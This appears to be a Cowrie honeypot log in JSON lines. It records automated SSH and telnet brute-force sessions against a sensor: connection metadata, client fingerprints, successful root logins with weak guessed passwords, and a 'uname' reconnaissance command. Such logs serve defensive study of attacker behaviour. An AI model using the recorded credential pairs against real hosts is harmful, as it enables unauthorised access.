{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T06:08:14.779644Z","src_ip":"172.105.128.11","session":"ef6599cb273b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:15.385830Z","src_ip":"172.105.128.11","session":"ef6599cb273b"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.128.11","src_port":63518,"dst_ip":"1.2.3.4","dst_port":22,"session":"92c56676ab5e","protocol":"ssh","message":"New connection: 172.105.128.11:63518 (1.2.3.4:22) [session: 92c56676ab5e]","sensor":"my-vps","timestamp":"2025-08-28T06:08:15.485830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:08:15.662968Z","src_ip":"172.105.128.11","session":"92c56676ab5e"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T06:08:15.663795Z","src_ip":"172.105.128.11","session":"92c56676ab5e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:16.280805Z","src_ip":"172.105.128.11","session":"92c56676ab5e"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":46376,"dst_ip":"1.2.3.4","dst_port":23,"session":"58eaed19218a","protocol":"telnet","message":"New connection: 8.222.212.69:46376 (1.2.3.4:23) [session: 58eaed19218a]","sensor":"my-vps","timestamp":"2025-08-28T06:08:21.137458Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36998,"dst_ip":"1.2.3.4","dst_port":22,"session":"70ed2a809339","protocol":"ssh","message":"New connection: 212.227.235.229:36998 (1.2.3.4:22) [session: 70ed2a809339]","sensor":"my-vps","timestamp":"2025-08-28T06:08:21.286438Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:08:21.287443Z","src_ip":"212.227.235.229","session":"70ed2a809339"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:08:21.431356Z","src_ip":"212.227.235.229","session":"70ed2a809339"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456A","message":"login attempt [root/a123456A] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:08:21.865566Z","src_ip":"212.227.235.229","session":"70ed2a809339"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:08:22.174182Z","src_ip":"212.227.235.229","session":"70ed2a809339"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:08:22.174964Z","src_ip":"212.227.235.229","session":"70ed2a809339"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:22.320420Z","src_ip":"212.227.235.229","session":"70ed2a809339"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:22.321762Z","src_ip":"212.227.235.229","session":"70ed2a809339"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":54428,"dst_ip":"1.2.3.4","dst_port":23,"session":"b3543f68adfe","protocol":"telnet","message":"New connection: 8.222.212.69:54428 (1.2.3.4:23) [session: b3543f68adfe]","sensor":"my-vps","timestamp":"2025-08-28T06:08:23.673843Z"}
{"eventid":"cowrie.session.closed","duration":30.81671452522278,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:32.367607Z","src_ip":"8.222.212.69","session":"db3dec92e366"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46184,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd45aeb2d42a","protocol":"ssh","message":"New connection: 212.227.125.160:46184 (1.2.3.4:22) [session: dd45aeb2d42a]","sensor":"my-vps","timestamp":"2025-08-28T06:08:33.967377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:08:33.968407Z","src_ip":"212.227.125.160","session":"dd45aeb2d42a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53288,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f1ba29a96e5","protocol":"ssh","message":"New connection: 212.227.235.229:53288 (1.2.3.4:22) [session: 7f1ba29a96e5]","sensor":"my-vps","timestamp":"2025-08-28T06:08:33.982377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:08:33.983128Z","src_ip":"212.227.235.229","session":"7f1ba29a96e5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:08:34.073347Z","src_ip":"212.227.125.160","session":"dd45aeb2d42a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:08:34.126203Z","src_ip":"212.227.235.229","session":"7f1ba29a96e5"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@123","message":"login attempt [root/Admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:08:34.391178Z","src_ip":"212.227.125.160","session":"dd45aeb2d42a"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@123","message":"login attempt [root/Admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:08:34.557846Z","src_ip":"212.227.235.229","session":"7f1ba29a96e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:08:34.686985Z","src_ip":"212.227.125.160","session":"dd45aeb2d42a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:08:34.687695Z","src_ip":"212.227.125.160","session":"dd45aeb2d42a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:34.793681Z","src_ip":"212.227.125.160","session":"dd45aeb2d42a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:34.794948Z","src_ip":"212.227.125.160","session":"dd45aeb2d42a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:08:34.920302Z","src_ip":"212.227.235.229","session":"7f1ba29a96e5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:08:34.920998Z","src_ip":"212.227.235.229","session":"7f1ba29a96e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:35.065980Z","src_ip":"212.227.235.229","session":"7f1ba29a96e5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:35.067189Z","src_ip":"212.227.235.229","session":"7f1ba29a96e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39940,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef0cfbb4d454","protocol":"ssh","message":"New connection: 212.227.125.160:39940 (1.2.3.4:22) [session: ef0cfbb4d454]","sensor":"my-vps","timestamp":"2025-08-28T06:08:41.510252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:08:41.511354Z","src_ip":"212.227.125.160","session":"ef0cfbb4d454"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:08:41.616301Z","src_ip":"212.227.125.160","session":"ef0cfbb4d454"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123456","message":"login attempt [root/qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:08:42.094530Z","src_ip":"212.227.125.160","session":"ef0cfbb4d454"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:08:42.347618Z","src_ip":"212.227.125.160","session":"ef0cfbb4d454"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:08:42.348387Z","src_ip":"212.227.125.160","session":"ef0cfbb4d454"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:42.454995Z","src_ip":"212.227.125.160","session":"ef0cfbb4d454"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:42.456037Z","src_ip":"212.227.125.160","session":"ef0cfbb4d454"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":37396,"dst_ip":"1.2.3.4","dst_port":23,"session":"6abe95105861","protocol":"telnet","message":"New connection: 8.222.212.69:37396 (1.2.3.4:23) [session: 6abe95105861]","sensor":"my-vps","timestamp":"2025-08-28T06:08:51.074043Z"}
{"eventid":"cowrie.session.closed","duration":30.650421619415283,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:54.324189Z","src_ip":"8.222.212.69","session":"b3543f68adfe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38726,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f06f7a99752","protocol":"ssh","message":"New connection: 212.227.235.229:38726 (1.2.3.4:22) [session: 1f06f7a99752]","sensor":"my-vps","timestamp":"2025-08-28T06:08:56.048244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:08:56.050103Z","src_ip":"212.227.235.229","session":"1f06f7a99752"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:08:56.209781Z","src_ip":"212.227.235.229","session":"1f06f7a99752"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123456","message":"login attempt [root/qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:08:56.659333Z","src_ip":"212.227.235.229","session":"1f06f7a99752"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:08:57.086388Z","src_ip":"212.227.235.229","session":"1f06f7a99752"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:08:57.087721Z","src_ip":"212.227.235.229","session":"1f06f7a99752"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:57.249197Z","src_ip":"212.227.235.229","session":"1f06f7a99752"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:57.250579Z","src_ip":"212.227.235.229","session":"1f06f7a99752"}
{"eventid":"cowrie.session.closed","duration":39.410242795944214,"message":"Connection lost after 39 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:00.547614Z","src_ip":"8.222.212.69","session":"58eaed19218a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63166,"dst_ip":"1.2.3.4","dst_port":22,"session":"7737d8569ea3","protocol":"ssh","message":"New connection: 217.72.205.35:63166 (1.2.3.4:22) [session: 7737d8569ea3]","sensor":"my-vps","timestamp":"2025-08-28T06:09:00.965785Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:00.967175Z","src_ip":"217.72.205.35","session":"7737d8569ea3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62601,"dst_ip":"1.2.3.4","dst_port":22,"session":"06fb84e5f306","protocol":"ssh","message":"New connection: 212.227.125.160:62601 (1.2.3.4:22) [session: 06fb84e5f306]","sensor":"my-vps","timestamp":"2025-08-28T06:09:03.500186Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T06:09:03.501012Z","src_ip":"212.227.125.160","session":"06fb84e5f306"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42106,"dst_ip":"1.2.3.4","dst_port":22,"session":"5eb6f3c6128b","protocol":"ssh","message":"New connection: 212.227.125.160:42106 (1.2.3.4:22) [session: 5eb6f3c6128b]","sensor":"my-vps","timestamp":"2025-08-28T06:09:03.661826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:09:03.662501Z","src_ip":"212.227.125.160","session":"5eb6f3c6128b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:09:03.767842Z","src_ip":"212.227.125.160","session":"5eb6f3c6128b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33744,"dst_ip":"1.2.3.4","dst_port":22,"session":"30c879cc54c8","protocol":"ssh","message":"New connection: 212.227.235.229:33744 (1.2.3.4:22) [session: 30c879cc54c8]","sensor":"my-vps","timestamp":"2025-08-28T06:09:03.822768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:09:03.823547Z","src_ip":"212.227.235.229","session":"30c879cc54c8"}
